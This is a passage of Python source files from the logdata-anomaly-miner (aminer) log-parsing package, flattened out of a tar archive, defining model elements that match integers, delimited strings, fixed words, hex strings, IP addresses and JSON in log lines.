(DecimalIntegerValueModelElement.PAD_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_ZERO, DecimalIntegerValueModelElement.PAD_TYPE_BLANK): msg = f"Invalid value_pad_type {value_pad_type}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.digits = set(b"0123456789") def get_match_element(self, path: str, match_context): """Find the maximum number of bytes forming a integer number according to the parameters specified. @param path to be printed in the MatchElement. @param match_context the match_context to be analyzed. @return a match when at least one byte being a digit was found. """ data = match_context.match_data if not data or (data[0] not in self.start_characters): return None match_len = 1 if self.pad_characters == b"" and data.startswith(b"0") and not data.startswith(b"0.") and len(data) > 1 and \ data[1] in self.digits: return None for test_byte in data[match_len:]: if test_byte not in self.pad_characters: break match_len += 1 num_start_pos = match_len for test_byte in data[match_len:]: if test_byte not in self.digits: break match_len += 1 if match_len == 1: if data[0] not in self.digits: return None elif num_start_pos == match_len and match_len == 1: # only return None if match_len is 1 to allow 00 with zero padding. return None match_string = data[:match_len] try: if self.pad_characters == b" " and match_string[0] in b"+-": match_value = int(match_string.replace(b" ", b"", 1)) else: match_value = int(match_string) except ValueError: return None match_context.update(match_string) return MatchElement(f"{path}/{self.element_id}", match_string, match_value, None) DelimitedDataModelElement.py000066400000000000000000000050151500476301700361270ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines a model element that takes any string up to a specific delimiter string. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface import re class DelimitedDataModelElement(ModelElementInterface): """Find a string delimited by given non-escaped delimiter string, possibly a match of zero byte length.""" def __init__(self, element_id: str, delimiter: bytes, escape: bytes = None, consume_delimiter: bool = False): """Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. @param delimiter a non-escaped delimiter string to search for. @param escape a character to escape in the string. @param consume_delimiter True if the delimiter character should also be consumed. """ super().__init__(element_id, delimiter=delimiter, escape=escape, consume_delimiter=consume_delimiter) def get_match_element(self, path: str, match_context): """Find the maximum number of bytes before encountering the non-escaped delimiter. @return a match when at least one byte was found but not the delimiter itself. """ data = match_context.match_data match_len = -1 if self.escape is None: search = re.search(re.escape(self.delimiter), data) if search is not None: match_len = search.start() else: search = re.search(rb"(?. """ from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.parsing.MatchElement import MatchElement from aminer import AminerConfig from typing import Union class ElementValueBranchModelElement(ModelElementInterface): """This class defines an element that selects a branch path based on a previous model value.""" def __init__(self, element_id: str, value_model: ModelElementInterface, value_path: Union[str, None], branch_model_dict: dict, default_branch: Union[str, int] = None): """Create the branch model element. @param element_id an identifier for the ModelElement which is shown in the path. @param value_model the ModelElement which has to match the data. @param value_path the relative path to the target value from the value_model element on. When the path does not resolve to a value, this model element will not match. A path value of None indicates, that the match element of the value_model should be used directly. @param branch_model_dict a dictionary to select a branch for the value identified by valuePath. @param default_branch when lookup in branch_model_dict fails, use this as default branch or fail when None. """ self.value_path = value_path super().__init__( element_id, value_model=value_model, value_path=value_path, branch_model_dict=branch_model_dict, default_branch=default_branch) def get_match_element(self, path: str, match_context): """Try to find a match on given data for the test model and the selected branch. @param path the model path to the parent model element invoking this method. @param match_context an instance of MatchContext class holding the data context to match against. @return the matchElement or None if the test model did not match, no branch was selected or the branch did not match. """ current_path = f"{path}/{self.element_id}" start_data = match_context.match_data model_match = self.value_model.get_match_element(current_path, match_context) if model_match is None: return None # Now extract the test path value from the model_match. From here on, the matchContext is already modified so we must NEVER just # return but revert the changes in the context first. remaining_value_path = self.value_path test_match = model_match current_test_path = test_match.get_path() while remaining_value_path is not None: next_part_pos = remaining_value_path.find('/') if next_part_pos <= 0: current_test_path += '/' + remaining_value_path remaining_value_path = None else: current_test_path += '/' + remaining_value_path[:next_part_pos] remaining_value_path = remaining_value_path[next_part_pos + 1:] match_children = test_match.get_children() test_match = None if match_children is None: break for child in match_children: if child.get_path() == current_test_path: test_match = child break branch_match = None if test_match is not None: if isinstance(test_match.get_match_object(), bytes): branch_model = self.branch_model_dict.get(test_match.get_match_object().decode(AminerConfig.ENCODING), self.default_branch) else: branch_model = self.branch_model_dict.get(test_match.get_match_object(), self.default_branch) if branch_model is not None: branch_match = branch_model.get_match_element(current_path, match_context) if branch_match is None: match_context.match_data = start_data return None return MatchElement(current_path, start_data[:len(start_data) - len(match_context.match_data)], start_data[:len(start_data) - len(match_context.match_data)], [model_match, branch_match]) FirstMatchModelElement.py000066400000000000000000000034151500476301700355030ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines a model element that allows branches. The first matching branch is taken. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.parsing.ModelElementInterface import ModelElementInterface class FirstMatchModelElement(ModelElementInterface): """This class defines a model element to return the match from the the first matching child model within a given list.""" def __init__(self, element_id: str, children: list): """Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. @param children a list of child elements to be iterated through. """ super().__init__(element_id, children=children) def get_match_element(self, path: str, match_context): """@return None when there is no match, MatchElement otherwise.""" current_path = f"{path}/{self.element_id}" match_data = match_context.match_data for child_element in self.children: child_match = child_element.get_match_element(current_path, match_context) if child_match is not None: return child_match match_context.match_data = match_data return None FixedDataModelElement.py000066400000000000000000000033231500476301700352660ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines a model element representing a fixed string. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface class FixedDataModelElement(ModelElementInterface): """This class defines a model element of a fixed string. The model element is considered a match if the fixed string is found at this position in the log atom. """ def __init__(self, element_id: str, fixed_data: bytes): """Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. @param fixed_data a non-escaped delimiter string to search for. """ super().__init__(element_id, fixed_data=fixed_data) def get_match_element(self, path: str, match_context): """@return None when there is no match, MatchElement otherwise.""" if not match_context.match_data.startswith(self.fixed_data): return None match_context.update(self.fixed_data) return MatchElement(f"{path}/{self.element_id}", self.fixed_data, self.fixed_data, None) FixedWordlistDataModelElement.py000066400000000000000000000042311500476301700370150ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines a model element to detect fixed strings from a list of words. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.parsing.MatchElement import MatchElement class FixedWordlistDataModelElement(ModelElementInterface): """This class defines a model element to detect fixed strings from a list of words. The match will return the position of the word in the search list, thus the sorting of the list is important. Apart from that, the wordlist must not contain any words, that are identical to the beginning of words later in the list. In that case, the longer match could never be detected. """ def __init__(self, element_id: str, wordlist: list): """Create the model element. @param wordlist the list of words to search for. If it does not fulfill the sorting criteria mentioned in the class documentation, an Exception will be raised. """ super().__init__(element_id, wordlist=wordlist) def get_match_element(self, path: str, match_context): """@return None when there is no match, MatchElement otherwise.""" data = match_context.match_data match_data = None word_pos = 0 for word in self.wordlist: if data.startswith(word): match_data = word break word_pos += 1 if match_data is None: return None match_context.update(match_data) return MatchElement(f"{path}/{self.element_id}", match_data, word_pos, None) HexStringModelElement.py000066400000000000000000000043331500476301700353520ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines a model element that represents a hex string of arbitrary length. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer import AminerConfig class HexStringModelElement(ModelElementInterface): """This class just tries to strip off as many hex bytes as possible from a given data string.""" def __init__(self, element_id: str, upper_case: bool = False): """Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. @param upper_case if True, the letters of the hex alphabet are uppercase, otherwise they are lowercase. """ super().__init__(element_id, upper_case=upper_case) def get_match_element(self, path: str, match_context): """Find the maximum number of bytes forming a integer number according to the parameters specified. @return a match when at least one byte being a digit was found """ m = self.hex_regex.match(match_context.match_data) if m is None: return None match_len = m.span(0)[1] match_object = match_context.match_data[:match_len] try: pad = "" if len(match_object.decode(AminerConfig.ENCODING)) % 2 != 0: pad = "0" match_string = bytes.fromhex(pad + match_object.decode(AminerConfig.ENCODING)) except ValueError: return None match_context.update(match_object) return MatchElement(f"{path}/{self.element_id}", match_string, match_object, None) IpAddressDataModelElement.py000066400000000000000000000116771500476301700361200ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines a model element that represents an IP address. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import re from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface class IpAddressDataModelElement(ModelElementInterface): """This class defines a model element that matches an IP address.""" def __init__(self, element_id: str, ipv6: bool = False): """Create an element to match IP addresses. @param element_id an identifier for the ModelElement which is shown in the path. @param ipv6 if True, IPv6 addresses are parsed, IPv4 addresses are parsed otherwise. """ super().__init__(element_id, ipv6=ipv6) if not ipv6: # self.regex = re.compile(br"((2[0-4][0-9]|1[0-9][0-9]|25[0-5]|[1-9]?[0-9])\.){3}(2[0-4][0-9]|1[0-9][0-9]|25[0-5]|[1-9]?[0-9])") # use a simpler regex to improve the performance. self.regex = re.compile(br"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}") self.extract = extract_ipv4_address else: # modified regex from https://community.helpsystems.com/forums/intermapper/miscellaneous-topics/ # 5acc4fcf-fa83-e511-80cf-0050568460e4?_ga=2.113564423.1432958022.1523882681-2146416484.1523557976 i4 = br"((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})" self.regex = re.compile( br"((([0-9A-Fa-f]{1,4}:){7}([0-9A-Fa-f]{1,4}|:))|(([0-9A-Fa-f]{1,4}:){6}(:[0-9A-Fa-f]{1,4}|"+i4+br"|:))|(([0-9A-Fa-f]{1,4}:" br"){5}(((:[0-9A-Fa-f]{1,4}){1,2})|:"+i4+br"|:))|(([0-9A-Fa-f]{1,4}:){4}(((:[0-9A-Fa-f]{1,4}){1,3})|((:[0-9A-Fa-f]{1,4})?" br":"+i4+br")|:))|(([0-9A-Fa-f]{1,4}:){3}(((:[0-9A-Fa-f]{1,4}){1,4})|((:[0-9A-Fa-f]{1,4}){0,2}:"+i4+br")|:))|(([0-9A-Fa-f]{" br"1,4}:){2}(((:[0-9A-Fa-f]{1,4}){1,5})|((:[0-9A-Fa-f]{1,4}){0,3}:"+i4+br")|:))|(([0-9A-Fa-f]{1,4}:){1}(((:[0-9A-Fa-f]{" br"1,4}){1,6})|((:[0-9A-Fa-f]{1,4}){0,4}:"+i4+br")|:))|(:(((:[0-9A-Fa-f]{1,4}){1,7})|((:[0-9A-Fa-f]{1,4}){0,5}:"+i4+br")|:" br")))(%.+)?") self.extract = extract_ipv6_address def get_match_element(self, path: str, match_context): """Read an IP address at the current data position. When found, the match_object will be. Allowed formats for IPv6 addresses are defined in RFC4291 section 2.2. However, trailing IPv4 addresses (for example ::FFFF:129.144.52.38) are not allowed. """ data = match_context.match_data m = self.regex.match(data) if m is None: return None match_len = m.span(0)[1] if self.extract is extract_ipv6_address and (b"." in m.group()[:match_len].split(b":")[-1] or (len(data) > match_len and ( re.compile(br"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}").match(data[data.rfind(b":", 0, match_len) + 1:]) is not None or ( data.find(b"::", match_len) == match_len and b"::" in data)))): return None extracted_address = self.extract(m.group(), match_len) if extracted_address is None: return None match_string = data[:match_len] match_context.update(match_string) return MatchElement(f"{path}/{self.element_id}", match_string, extracted_address, None) def extract_ipv4_address(data: bytes, match_len: int): """Calculate integer values from ipv4 addresses.""" numbers = [int(number) for number in data[:match_len].split(b".")] for number in numbers: if number > 255: return None return (numbers[0] << 24) + (numbers[1] << 16) + (numbers[2] << 8) + numbers[3] def extract_ipv6_address(data: bytes, match_len: int): """Calculate integer values from ipv6 addresses.""" parts = data[:match_len].split(b":") if b"" in parts: index = parts.index(b"") # addresses can start or end with ::. Handle this special case. parts = [number for number in parts if number != b""] parts = parts[:index] + [b"0"] * (8 - len(parts)) + parts[index:] numbers = [int(b"0x" + number, 16) for number in parts] for number in numbers: if number > 65535: return None return (numbers[0] << 112) + (numbers[1] << 96) + (numbers[2] << 80) + (numbers[3] << 64) + (numbers[4] << 48) + (numbers[5] << 32)\ + (numbers[6] << 16) + (numbers[7]) JsonModelElement.py000066400000000000000000000712651500476301700343600ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines a model element that takes any string up to a specific delimiter string. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import json import warnings import logging from typing import List, Union, Any from json import JSONDecodeError from aminer.parsing.MatchElement import MatchElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.AminerConfig import DEBUG_LOG_NAME warnings.filterwarnings("ignore", category=DeprecationWarning) debug_log_prefix = "JsonModelElement: " def format_float(val): """This function formats the float-value and parses the sign and the exponent.""" exp = None if "e" in val: exp = "e" elif "E" in val: exp = "E" if "+" in val: sign = "+" else: sign = "-" if exp is not None: pos_point = val.find(exp) if "." in val: pos_point = val.find(".") if len(val) - val.find(sign) <= 2: format_val = format(float(val), f"1.{val.find(exp) - pos_point}E") return format_val[:-2] + format_val[-1] return format(float(val), f"1.{val.find(exp) - pos_point}E") return float(val) class JsonModelElement(ModelElementInterface): """Parse single- or multi-lined JSON data.""" def __init__(self, element_id: str, key_parser_dict: dict, optional_key_prefix: str = "optional_key_", nullable_key_prefix: str = "+", allow_all_fields: bool = False): """Initialize the JsonModelElement. @param element_id: The ID of the element. @param key_parser_dict: A dictionary of all keys with the according parsers. If a key should be optional, the associated parser must start with the OptionalMatchModelElement. To allow every key in a JSON object use "key": "ALLOW_ALL". To allow only empty arrays - [] - use "key": "EMPTY_ARRAY". To allow only empty objects - {} - use "key": "EMPTY_OBJECT". To allow only empty strings - "" - use "key": "EMPTY_STRING". To allow all keys in an object for a parser use "ALLOW_ALL_KEYS": parser. To allow only null values use "key": "NULL_OBJECT". @param optional_key_prefix: If some key starts with the optional_key_prefix it will be considered optional. @param nullable_key_prefix: The value of this key may be null instead of any expected value. @param allow_all_fields: Unknown fields are skipped without parsing with any parsing model. """ super().__init__(element_id, key_parser_dict=key_parser_dict, optional_key_prefix=optional_key_prefix, nullable_key_prefix=nullable_key_prefix, allow_all_fields=allow_all_fields) self.dec_escapes = False self.validate_key_parser_dict(key_parser_dict) def validate_key_parser_dict(self, dictionary: dict): """Validate the key_parser_dict.""" for value in dictionary.values(): if isinstance(value, ModelElementInterface): continue if isinstance(value, list): if len(value) == 0: msg = "lists in key_parser_dict must have at least one entry." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) for v in value: if isinstance(v, dict): self.validate_key_parser_dict(v) elif isinstance(value, dict): self.validate_key_parser_dict(value) elif value not in ("ALLOW_ALL", "EMPTY_ARRAY", "EMPTY_OBJECT", "EMPTY_STRING", "ALLOW_ALL_KEYS", "NULL_OBJECT"): msg = "wrong type found in key_parser_dict." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) def is_ascii(self, text: str): """Check if the text contains only ascii characters.""" try: text.encode("ascii") return True except UnicodeEncodeError: return False def get_full_key(self, key, dictionary): """Find the full key in the dictionary.""" options = [self.optional_key_prefix + self.nullable_key_prefix + key, self.nullable_key_prefix + self.optional_key_prefix + key, self.optional_key_prefix + key, self.nullable_key_prefix + key] for option in options: if option in dictionary: return option return key def get_stripped_key(self, key): """Return the key without optional_key_prefix and nullable_key_prefix.""" if key.startswith(self.optional_key_prefix): key = key[len(self.optional_key_prefix):] if key.startswith(self.nullable_key_prefix): key = key[len(self.nullable_key_prefix):] if key.startswith(self.optional_key_prefix): key = key[len(self.optional_key_prefix):] return key def is_nullable_key(self, key): """Check if the key is nullable.""" return key.startswith(self.nullable_key_prefix) or ( key.startswith(self.optional_key_prefix) and key[len(self.optional_key_prefix):].startswith(self.nullable_key_prefix)) def get_unescaped_quotes(self, data): quotes = [i for i in range(len(data)) if data.startswith(b"\"", i)] result_quotes = [] for quote in quotes: if bytes([data[quote - 1]]) != b"\\": result_quotes.append(quote) return result_quotes def index_is_in_json_string(self, quotes, index): """Check if index is in json string.""" for i in range(len(quotes)-1): if quotes[i] < index < quotes[i+1] and i % 2 == 0: return True return False def get_match_element(self, path: str, match_context): """Try to parse all the match_context against JSON. When a match is found, the match_context is updated accordingly. @param path the model path to the parent model element invoking this method. @param match_context an instance of MatchContext class holding the data context to match against. @return the matchElement or None if model did not match. """ current_path = f"{path}/{self.element_id}" old_match_data = match_context.match_data matches: Union[List[Union[MatchElement, None]]] = [] try: index = 0 # There can be a valid case in which the text contains for example \x2d, \\x2d or \\\\x2d, which basically should be decoded # into the unicode form. while index != -1: index = match_context.match_data.find(rb"\x") if index != -1: try: match_context.match_data = match_context.match_data.decode("unicode-escape").encode() except UnicodeDecodeError: break index = 0 quotes = self.get_unescaped_quotes(match_context.match_data) while index != -1: index = match_context.match_data.find(b"\\", index) if index != -1 and len(match_context.match_data) - 1 > index and match_context.match_data[ index + 1] not in b"\\'\"abfnrtv/": match_context.match_data = match_context.match_data[:index] + b"\\" + match_context.match_data[index:] index += 2 elif index != -1: index += 2 for num in b"\n\r\t": index = 0 char = bytes([num]) while index != -1: index = match_context.match_data.find(char, index) if index != -1 and len(match_context.match_data) - 1 > index and self.index_is_in_json_string(quotes, index): escaped = (bytes([match_context.match_data[index]]).replace(b"\n", b"\\n").replace(b"\t", b"\\t")) match_context.match_data = match_context.match_data[:index] + escaped + match_context.match_data[index + 1:] index += 2 elif index != -1: index += 2 logging.getLogger(DEBUG_LOG_NAME).debug(repr(match_context.match_data)) json_match_data = json.loads(match_context.match_data, parse_float=format_float) if not isinstance(json_match_data, dict): return None except JSONDecodeError as e: logging.getLogger(DEBUG_LOG_NAME).debug(e) return None self.dec_escapes = True if self.is_ascii(match_context.match_data.decode()): match_context.match_data = match_context.match_data.decode("unicode-escape").encode() self.dec_escapes = False matches += self.parse_json_dict(self.key_parser_dict, json_match_data, current_path, match_context) remove_chars = [b' ', b'}', b']', b'"', b'\r', b'\n'] match_data = match_context.match_data for c in remove_chars: match_data = match_data.replace(c, b"") if None in matches or (match_data != b"" and len(matches) > 0): logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "get_match_element_main NONE RETURNED\n" + match_context.match_data.strip(b' }]"\r\n').decode()) match_context.match_data = old_match_data return None # remove all remaining spaces and brackets. match_context.update(match_context.match_data) if len(matches) == 0: resulting_matches = None else: resulting_matches = matches return MatchElement(current_path, str(json_match_data).encode(), json_match_data, resulting_matches) # type: ignore[arg-type] def parse_json_dict(self, json_dict: dict, json_match_data: dict, current_path: str, match_context): """Parse a json dictionary.""" matches: List[Union[MatchElement, None]] = [] if not self.check_keys(json_dict, json_match_data, match_context): return [None] for i, key in enumerate(json_match_data.keys()): split_key = key key = self.get_full_key(key, json_dict) if key not in json_dict: index = match_context.match_data.find(key.encode()) match_context.update(match_context.match_data[:index]) logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN [NONE] 2" + key + str(json_dict)) if "ALLOW_ALL_KEYS" in json_dict.keys(): key = "ALLOW_ALL_KEYS" elif self.allow_all_fields: index = match_context.match_data.find(key.encode()) + len(key.encode()) index += len(match_context.match_data) - len(match_context.match_data[index:].lstrip(b' \n\t:"')) + \ len(str(json_match_data[key])) match_context.update(match_context.match_data[:index]) if match_context.match_data.replace(b"}", b"").replace(b"]", b"").replace(b'"', b"") == b"": match_context.update(match_context.match_data) continue else: return [None] value = json_dict[key] if isinstance(value, (dict, list)) and (not isinstance(json_match_data, dict) or split_key not in json_match_data): logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN [NONE] 3, Key: " + split_key + ", Value: " + repr(value)) return [None] if isinstance(value, dict): if json_match_data[split_key] is None and (json_dict[key] == "NULL_OBJECT" or self.is_nullable_key(key)): data = b"null" matches.append(MatchElement(f"{current_path}/{key}", data, data, None)) index = match_context.match_data.find(data) if match_context.match_data[index + 4] == 34: # " index += 1 match_context.update(match_context.match_data[:index + len(data)]) return matches matches += self.parse_json_dict(value, json_match_data[split_key], f"{current_path}/{split_key}", match_context) if json_match_data[split_key] == {}: index = match_context.match_data.find(split_key.encode()) index = match_context.match_data.find(b"}", index) data = match_context.match_data[:index] match_element = MatchElement(current_path+"/"+key, data, data, None) matches.append(match_element) match_context.update(match_context.match_data[:index]) if (len(matches) == 0 and not key.startswith(self.optional_key_prefix)) or (len(matches) > 0 and matches[-1] is None): logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "No match found for key " + split_key) return matches elif isinstance(value, list): res = self.parse_json_array(json_dict, json_match_data, key, split_key, current_path, matches, match_context, i) if res is not None: return res elif value == "EMPTY_OBJECT": if isinstance(json_match_data[split_key], dict) and len(json_match_data[split_key].keys()) == 0: index = match_context.match_data.find(b"}") + 1 data = match_context.match_data[:index] match_element = MatchElement(current_path+"/"+key, data, data, None) matches.append(match_element) match_context.update(data) else: logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "EMPTY_OBJECT " + split_key + " is not empty. Keys: " + str(json_match_data[split_key].keys())) matches.append(None) elif json_dict[key] == "EMPTY_ARRAY": if isinstance(json_match_data[split_key], list) and len(json_match_data[split_key]) == 0: index = match_context.match_data.find(b"]") + 1 data = match_context.match_data[:index] match_element = MatchElement(current_path+"/"+key, data, data, None) matches.append(match_element) match_context.update(data) else: logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "EMPTY_ARRAY " + split_key + " is not empty. Data: " + str(json_match_data[split_key])) matches.append(None) else: if key != split_key and split_key not in json_match_data: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + f"Optional Key {key} not found in json_match_data") continue if split_key not in json_match_data: logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + f"Key {split_key} not found in json_match_data. RETURN [NONE] 4") return [None] match_element, index, data = self.parse_json_object(json_dict, json_match_data, key, split_key, current_path, match_context) matches.append(match_element) if index == -1 and match_element is None: backslash = b"\\" logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + f"Necessary element did not match! Key: {key}, MatchElement: {match_element}, Data: " f"{data.decode()}, IsFloat {isinstance(json_match_data[split_key], float)}, Index: {index}, " f"MatchContext: {match_context.match_data.replace(backslash, b'').decode()}") return matches match_context.update(match_context.match_data[:index + len(data)]) missing_keys = [x for x in json_dict if self.get_stripped_key(x) not in json_match_data and x != "ALLOW_ALL_KEYS" and not (x.startswith(self.optional_key_prefix) or x.startswith(self.nullable_key_prefix + self.optional_key_prefix))] for key in missing_keys: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "Missing Key: " + key) return [None] return matches def check_keys(self, json_dict, json_match_data, match_context): """Check if no keys are missing and if the value types match.""" if "ALLOW_ALL_KEYS" in json_dict.keys(): return True if json_match_data is None: return False missing_keys = [x for x in json_dict if self.get_stripped_key(x) not in json_match_data and not (x.startswith( self.optional_key_prefix) or x.startswith(self.nullable_key_prefix + self.optional_key_prefix))] for key in missing_keys: if (not key.startswith(self.nullable_key_prefix) or ( key.startswith(self.nullable_key_prefix) and key[len(self.nullable_key_prefix):] not in json_match_data)): index = match_context.match_data.find(key.encode()) match_context.update(match_context.match_data[:index]) logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN [NONE] 1. Key: " + key) return False for key in json_dict.keys(): k = self.get_stripped_key(key) if not isinstance(json_match_data, dict) or (k in json_match_data and isinstance(json_match_data[k], list) and not isinstance( json_dict[key], list) and json_dict[key] != "EMPTY_ARRAY"): index = match_context.match_data.find(key.encode()) match_context.update(match_context.match_data[:index]) logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN [NONE] 5. Key: " + key) return False return True def flatten_list(self, lst: list): """Flatten a list of lists using this method recursively.""" if not isinstance(lst, list): return None res: List[Any] = [] for val in lst: if isinstance(val, list): res += self.flatten_list(val) else: res.append(val) return res def parse_json_array(self, json_dict: dict, json_match_data: dict, key: str, split_key: str, current_path: str, matches: list, match_context, i: int): """Parse an array in a json object.""" if json_match_data[split_key] is None and self.is_nullable_key(key): return None if not isinstance(json_match_data[split_key], list): if json_match_data[split_key] is None and key.startswith(self.optional_key_prefix): data = b"null" index = match_context.match_data.find(split_key.encode() + b'":') + len(split_key.encode() + b'":') index += match_context.match_data[index:].find(b"null") + len(b"null") match_context.update(match_context.match_data[:index]) matches.append(MatchElement(f"{current_path}/{key}", data, data, None)) return matches logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "Key " + split_key + " is no array. Data: " + str(json_match_data[split_key])) return [None] search_string = b"]" match_array = self.flatten_list(json_match_data[split_key]) value = self.flatten_list(json_dict[key]) for j, data in enumerate(match_array): for k, val in enumerate(value): if isinstance(data, str): enc = "utf-8" if self.dec_escapes and self.is_ascii(data): enc = "unicode-escape" data = data.encode(enc) if data is None: data = b"null" elif not isinstance(data, bytes): data = str(data).encode() if isinstance(val, dict): matches += self.parse_json_dict(val, match_array[j], f"{current_path}/{split_key}", match_context) if matches[-1] is None: if len(value) - 1 == k: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "No match found for key " + split_key) return matches del matches[-1] continue break else: if val == "ALLOW_ALL": logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "ALLOW_ALL (ARRAY)") match_element = MatchElement(current_path+"/"+key, data, data, None) elif json_dict[key] == "EMPTY_ARRAY": if isinstance(data, list) and len(data) == 0: index = match_context.match_data.find(search_string) data = match_context.match_data[:index] match_element = MatchElement(current_path+"/"+key, data, data, None) match_context.update(data) else: logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "EMPTY_ARRAY " + split_key + " is not empty. Data: " + json_match_data[split_key]) return None else: match_element = val.get_match_element(current_path, MatchContext(data)) if match_element is not None and len(match_element.match_string) != len(data): logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "MatchElement NONE 1. match_string: " + match_element.match_string.decode() + ", data: " + data.decode()) match_element = None if match_element is None: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "MatchElement NONE 2. Data: " + data.decode()) index = -1 else: index = match_context.match_data.find(data) match_context.update(match_context.match_data[:index + len(data)]) if index == -1 and val == "ALLOW_ALL": logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "ALLOW_ALL (ARRAY-ELEMENT). Data: " + match_context.match_data.decode()) index = match_context.match_data.find(search_string) match_context.update(match_context.match_data[:index]) if match_element is not None or (match_element is None and not key.startswith(self.optional_key_prefix)): matches.append(match_element) if index == -1: if len(value) - 1 == k: return matches del matches[-1] continue if len(matches) == 0: return [None] if matches[-1] is None: if len(value) - 1 == k: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN MATCHES 3") return matches del matches[-1] continue if len(json_match_data.keys()) > i + 1: match_context.update(match_context.match_data[:match_context.match_data.find(list(json_match_data.keys())[i + 1].encode())]) else: match_context.update(match_context.match_data[:match_context.match_data.find(search_string) + 